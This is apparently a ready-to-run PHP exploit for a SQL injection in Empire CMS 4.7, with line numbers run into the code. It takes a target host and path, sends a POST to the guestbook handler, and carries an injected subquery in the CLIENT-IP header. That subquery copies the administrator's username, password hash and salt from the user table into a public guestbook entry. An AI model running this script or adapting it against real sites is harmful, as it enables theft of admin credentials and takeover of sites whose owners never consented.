Empire CMS 47 SQL Injection

1.<?php2.print_r("3.+------------------------------------------------------------------+4.Application Info:5.Name: EmpireCMS476.--------------------------------------------7.Discoverd By: Securitylab.ir8.Contacts: info@securitylab[dot]ir9.Note: just work as php>=5&mysql>=4.110.--------------------------------------------11.Vulnerability Info:12.Sql Injection13.Medium Risk14.+------------------------------------------------------------------+15.");16.if ($argc<3) {17.echo "Usage: php ".$argv[0]." host path \n";18.echo "host: target server \n";19.echo "path: path to EmpireCMS47\n";20.echo "Example:\r\n";21.echo "php ".$argv[0]." localhost /\n";22.die;23.}24.$host=$argv[1];25.$path=$argv[2];26.$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";27.$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where 28.userid=1),'',1,'1111',0,0,'')/*";29.$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";30.$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";31.$message .= "Accept-Language: zh-cn\r\n";32.$message .= "Content-Type: application/x-www-form-urlencoded\r\n";33.$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";34.$message .= "CLIENT-IP: $cmd\r\n";35.$message .= "Host: $host\r\n";36.$message .= "Content-Length: ".strlen($data)."\r\n";37.$message .= "Cookie: ecmsgbookbid=1;\r\n";38.$message .= "Connection: Close\r\n";39.$message .= "\r\n";40.$message .=$data;41.$ock=fsockopen($host,80);42.if (!$ock) {43.echo 'No response from '.$host;44.die;45.}46.echo "[+]connected to the site!\r\n";47.echo "[+]sending data nowa|a|\r\n";48.fputs($ock,$message);49.@$resp ='';50.while ($ock && !feof($ock))51.$resp .= fread($ock, 1024);52.echo $resp;53.echo "[+]done!\r\n";54.echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash"55.?>